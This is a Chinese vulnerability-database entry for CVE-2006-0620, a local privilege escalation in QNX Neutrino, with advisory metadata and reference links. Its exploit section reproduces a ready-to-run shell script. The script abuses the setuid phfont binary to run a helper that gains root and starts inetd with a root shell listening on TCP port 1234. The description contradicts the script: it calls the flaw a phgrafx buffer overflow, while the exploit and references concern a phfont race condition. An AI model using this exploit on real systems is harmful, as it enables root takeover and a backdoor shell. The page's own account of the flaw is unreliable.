QNX Neutrino本地权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109717 漏洞类型 未知
发布时间 2006-02-08 更新时间 2006-02-10
CVE编号 CVE-2006-0620 CNNVD-ID CNNVD-200602-121
漏洞平台 QNX CVSS评分 6.2
|漏洞来源
https://www.exploit-db.com/exploits/1479
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-121
|漏洞详情
QNXNeutrino是嵌入式设备的微内核实时操作系统。QNXNeutrino的"phgrafx"工具中存在缓冲区溢出漏洞,恶意用户可以利用这个漏洞在本地获得权限提升。例如:qnx$uname-a;idQNXqnx6.3.02004/04/29-21:23:19UTCx86pcx86uid=6(deadbeef)gid=1(bin)groups=0(root),3(sys),4(adm),5(tty)qnx$gccphex.c-ophex-Wqnx$./phexshellcodelength:21address:0x8047a2cWarning:cannotfindpaletteunder'55°|ØHæ1°'.#iduid=6(deadbeef)gid=1(bin)euid=0(root)groups=0(root),3(sys),4(adm),5(tty)#
|漏洞EXP
#!/bin/sh
# word, exploit for http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
# greetings and salutations from www.lort.dk
# kokanin@dtors 18/10/2003
# $ cksum /usr/photon/bin/phfont
# 4123428723      30896 /usr/photon/bin/phfont
# $ uname -a
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86 
cat > phfontphf.c << __EOF__
int main(){
setuid(0);
system("echo 1234 stream tcp nowait root  /bin/sh       sh -i>/tmp/dsr && /usr/sbin/inetd /tmp/dsr");
} 
__EOF__
make phfontphf >/dev/null
ln -s /usr/photon/bin/phfont ./phfont
export PHFONT=hello
export PHOTON2_PATH=mom
./phfont
rm phfont*

# milw0rm.com [2006-02-08]
|参考资料

来源:IDEFENSE
名称:20060207QNXNeutrinoRTOSphfontRaceConditionVulnerability
链接:http://www.idefense.com/intelligence/vulnerabilities/display.php?id=383
来源:VUPEN
名称:ADV-2006-0474
链接:http://www.frsirt.com/english/advisories/2006/0474
来源:SECUNIA
名称:18750
链接:http://secunia.com/advisories/18750
来源:XF
名称:qnx-phfont-race-condition(24555)
链接:http://xforce.iss.net/xforce/xfdb/24555
来源:BID
名称:16539
链接:http://www.securityfocus.com/bid/16539
来源:OSVDB
名称:22963
链接:http://www.osvdb.org/22963
来源:SECTRACK
名称:1015599
链接:http://securitytracker.com/id?1015599